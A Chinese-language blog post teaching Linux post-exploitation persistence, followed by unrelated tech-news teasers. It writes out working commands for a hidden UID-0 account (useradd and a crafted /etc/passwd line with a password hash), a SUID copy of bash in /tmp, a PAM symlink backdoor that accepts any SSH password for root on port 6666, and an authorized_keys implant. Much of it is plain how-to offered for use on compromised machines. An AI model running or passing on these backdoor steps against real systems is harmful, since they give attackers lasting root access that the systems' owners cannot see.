发布时间:2026/8/14 14:57:44
linux权限维持 方法一.特权账号原理就是在系统添加一个root账号Linux的账号信息在/etc/passwd文件里面并且所有人可访问但是密码在/etc/shadow文件里面只有root可访问。/etc/passwd 字段格式格式用户名:密码占位符x:UID:GID:注释信息:家目录:登录ShellUIDUser ID用户 ID作用Linux 内核识别用户的数字编号用户名只是给人看的系统真正认 UID。root 的 UID0唯一超级用户拥有系统全部权限。1‑999系统内置账号daemon、bin 等给后台服务使用一般不允许登录。≥1000普通新建用户。GIDGroup ID组 ID作用用户所属主用户组的数字 ID。创建用户时默认会生成一个同名组GID 对应这个组。多个用户可以属于同一个组用来控制文件 / 目录的组权限rwx 组权限位。格式用户名:加密密码:最后一次改密码日期:最小间隔:最大间隔:警告天数:过期宽限:失效日期:保留注加密密码字段!账号被锁定禁止密码登录*系统账号无有效密码禁止登录$6$xxxxSHA‑512 加密的真实密码哈希最后改密码的天数从 1970‑01‑01 算起的天数我们添加用户直接用useradd命令正常添加用户 useradd 用户名 就行但是添加后的用户没有密码需要passwd命令手动设置但是shell一般无法做交互式的事情所以不能成功执行passwd所以无法ssh这时候就要用到-p参数。-p参数后面要加加密后的密码加密后的密码用openssl命令生成注里面的字符会被当做命令执行opensslpasswd-1-saltsalt123456-1使用 MD5‑crypt 算法加密shadow 里旧版1哈希-salt ‘salt’手动指定盐值为字符串salt123456是待加密明文密码盐 (salt) 核心作用防止彩虹表破解如果没有盐相同密码123456永远输出同一个哈希攻击者提前算好彩虹表直接查表爆破。加盐之后同样密码不同盐得到完全不一样的哈希盐会写入加密的密码前面接下来我们就可以以这个命令生成一个特权用户但是要在root权限生成。# 创建一个用户名guest密码123456的root用户useradd-popensslpasswd-1-saltsalt123456guest-o-u0-groot-Groot-s/bin/bash-d/home/test或者另一种方法直接把构造好的这个东西直接追加到passwd文件中这样就不用管shadow文件了test:$1$test$XazGnbtBRMhBkmTPV1qav/:0:0::/root:/bin/bash二.SUID权限维持SUID 介绍SUID 是一种特殊权限设置了 suid 的程序文件在用户执行该程序时用户的权限是该程序文件属主的权限例如程序文件的属主是 root那么执行该程序的用户就将暂时获得 root 账户的权限。sgid 与 suid 类似只是执行程序时获得的是文件属组的权限。注意以下几点1.只有可以执行的二进制程序文件才能设定 SUID 权限非二进制文件设置 SUID 权限没任何意义。2.命令执行者要对该程序文件拥有执行 (x) 权限。3.命令执行者在执行该程序时获得该程序文件属主的身份。4.SUID 权限只在该程序执行过程中有效也就是说身份改变只在程序执行过程中有效。第一步首先要找到bash文件whereisbash找到bash文件后复制一份出来cp/usr/bin/bash /tmp/.bash然后给加上s权限chmods /tmp/.bash 或chmod4755/tmp/.bash接下来就可以使用这个bash以root身份运行/tmp/.bash-p注意有的系统默认tmp是会忽略所有带s的参数以防suid攻击可以把后门放在其他目录例如home可以使用mount命令查看例如里面tmp目录就有nosuid所有不能再这个目录使用这个维持方法三.pam软链接维权注意1.可复现万能密码PAM 劫持生效OpenSSH ≤9.3p12.而且如果时centos系统需要修改/etc/selinux/config文件中的SELINUX“” 为 disabled3.如果依旧失败记得查看防火墙是不是开了ssh-V软链接一种特殊文件相当于快捷方式里面保存另一个文件的路径。访问软链接就等价访问源文件执行软链接时系统拿到的启动文件名是链接自身名字而非源程序。源文件删除后软链接失效。PAMLinux 的统一认证框架负责登录、权限校验。程序运行时根据调用的程序文件名加载 /etc/pam.d/ 下同名配置文件调用各类认证模块。pam_rootok.so是其中模块进程为 root 用户时直接认证通过跳过密码验证。1.我们通过建立一个ssh的后门首先需要看一下ssh是否使用pam模块验证默认支持ls/etc/pam.d然后看一下ssh是否启用了pamcat/etc/ssh/sshd_config|grepUsePAM 2.看一下哪些模块支持pam_rootok.sofind/etc/pam.d|xargsgreppam_rootok.so#xargs命令是把管道前面的每行结果当参数给xargs后面的命令3.例如上面的chsh支持pam_rootok.so模块ln-sf/usr/sbin/sshd /tmp/chsh;/tmp/chsh-oPort6666注意这里解释一下ln -sf /usr/sbin/sshd /tmp/chsh这行命令就是创建一个叫chsh的快捷方式而不是把chsh复制过去。因为pam在运行时会依据文件名来选择同名配置文件。使用叫chsh的文件名pam就会调用他的配置文件而chsh的配置文件支持pam_rootok.so模块。即只要以root身份去ssh那么建立进程的用户就是root而pam_rootok.so模块检测到root就直接验证成功不需要再验证密码了所以会直接成功登录。4.此时后门就建立了sshroot192.168.85.135-p6666密码验证时无论输入什么都成功不能直接回车必须随便输入点什么四.利用公私钥实现ssh维权1.步骤1在本地生成SSH密钥对在主机A上打开终端输入以下命令ssh-keygen-trsa在提示输入密钥密码时直接回车2.修改ssh配置文件vim/etc/ssh/sshd_config这三个权限一定要打开很多设置默认是注释掉的需要去掉注释打开权限PubkeyAuthentication yes // 授权公钥登录AuthorizedKeysFile .ssh/authorized_keys // 授权文件路径PasswordAuthentication yes // 密码授权PermitRootLogin yes /允许root进行ssh登录3.把公钥放到被控主机执行命令放入ssh-copy-id usernameserver_ip或者进入/root/.ssh手动放入公钥放入后必须改名为authorized_keys4.放入后就可以ssh了****

相关新闻

2026/8/14 14:57:44

NeurlPS 2025 | CHOICE:大型视觉-语言模型的遥感能力评估

文章目录1.论文信息2.论文主要贡献3.论文创新点4.研究方法4.1 总体概览4.2 层次能力分类法4.2.1 感知4.2.2 推理4.3 构建CHOICE5.实验验证5.1 主要结果5.2 细粒度分析5.3 结论6.个人声明1.论文信息 论文题目:CHOICE: Benchmarking the Remote Sensing Capabilities…

2026/8/14 14:52:43

南京百度网站建设多少钱?深度解析中小企业如何通过南京百度网站建设实现低成本高效率获客与品牌升级

在这个数字化浪潮汹涌的时代,很多企业老板每天都在思考同一个问题:为什么我的产品很好,服务也很棒,但在互联网上却像石沉大海,听不见一点响动?尤其是在南京这座六朝古都,历史文化底蕴深厚,现代商业活力十足,无数优质的中小企业在这里扎根。然而,很多老板发现,即使手…

2026/8/14 15:42:48

第5章 多帧对齐与融合:全局对齐、局部对齐与融合策略

作者:一位在ISP领域摸爬滚打十余年的算法工程师 “纸上得来终觉浅,绝知此事要躬行。”——这门课的每一行代码,都希望你亲自跑一遍。 从原理到代码,从理论到工程落地 本课程共30章,系统讲解ISP核心算法——多帧降噪、HDR合成、夜景算法的原理、实现与调优。 每章包含:原理…

2026/8/14 15:42:48

AI edusrc挖掘技巧信息收集篇

信息收集篇: 选择自己想挖掘的edu大学站进入fofa 先拿到它的一个ip host“fafu.edu.cn”在ip138里面搜索 这个ip210.34.80.210知道子网掩码 210.34.80.0/20 然后在新的界面点击旁站查询可以挑选信息多的 也可以看少的 也可以全部都看找功能点多的 静态网页 纯浪费时…

2026/8/14 15:42:48

基于linux上的终端贪吃蛇

摘要:不依赖图形库,用 C 语言在 Linux 终端实现贪吃蛇。本文从墙体绘制、蛇节点打印与移动、非阻塞键盘输入、食物随机生成到碰撞检测,逐步拆解核心逻辑,并附上关键代码与常见问题解决方案。前言:本文面向具备 C 语言基…

2026/8/14 4:27:24

如何快速生成中国车牌图片:Python开源工具完整指南

如何快速生成中国车牌图片:Python开源工具完整指南 【免费下载链接】chinese_license_plate_generator 中国车牌生成器 项目地址: https://gitcode.com/gh_mirrors/ch/chinese_license_plate_generator 中国车牌生成器是一个基于Python的开源项目&#xff0c…

2026/8/14 4:27:24

当 LLM 遇见大文档:主流开源项目如何处理上下文超限

从 Agentic Loop 到 Repo Map,七种策略与六类陷阱引言:128K vs 10MB 的硬冲突 2026 年的 LLM 上下文窗口已达到 128K ~ 1M token(≈ 0.5MB ~ 4MB 文本),但 LLM 想要处理的真实数据规模远远超过这个量级:真实…

2026/8/14 0:00:09

Flutter与OpenHarmony实现剧本杀组队表单开发实战

1. 项目概述在移动应用开发领域,跨平台框架Flutter因其高效的开发体验和出色的性能表现,已经成为众多开发者的首选。而OpenHarmony作为新兴的操作系统平台,其开放性和灵活性为开发者提供了全新的可能性。本文将聚焦于一个实际应用场景——剧本…

2026/8/14 0:00:09

VSCode高效Git管理:从入门到实战技巧

1. 为什么选择VSCode进行Git代码管理作为微软推出的轻量级代码编辑器,Visual Studio Code(简称VSCode)已经成为全球开发者使用率最高的编辑器之一。根据2023年Stack Overflow开发者调查,VSCode的市场占有率高达74.48%。它内置的Gi…

2026/8/14 4:27:24

实测才敢推 AI论文网站 2026最新测评与推荐

2026年真正好用的AI论文网站,核心看生成的论文质量、低AI味、格式正确、学术适配四大指标。综合实测,千笔AI、ThouPen、豆包、DeepSeek、Grammarly 是当前最值得推荐的梯队,覆盖从免费到付费、从中文到英文、从文科到理工的全场景需求。一、综…

2026/8/14 4:27:24

2026必备!AI论文网站测评:最新推荐与深度对比

2026年真正好用的AI论文网站,核心看生成的论文质量、低AI味、格式正确、学术适配四大指标。综合实测,千笔AI、ThouPen、豆包、DeepSeek、Grammarly 是当前最值得推荐的梯队,覆盖从免费到付费、从中文到英文、从文科到理工的全场景需求。 一、…

2026/8/14 4:27:24

摆脱论文困扰!盘点2026年全网爆红的的AI论文写作工具

一天写完毕业论文在2026年已不再是天方夜谭。2026年最炸裂、实测能大幅提速的AI论文写作工具,覆盖选题构思、文献整理、内容生成、格式排版等核心场景,真正帮你高效搞定论文难题。 一、全流程王者:一站式搞定论文全链路(一天定稿首…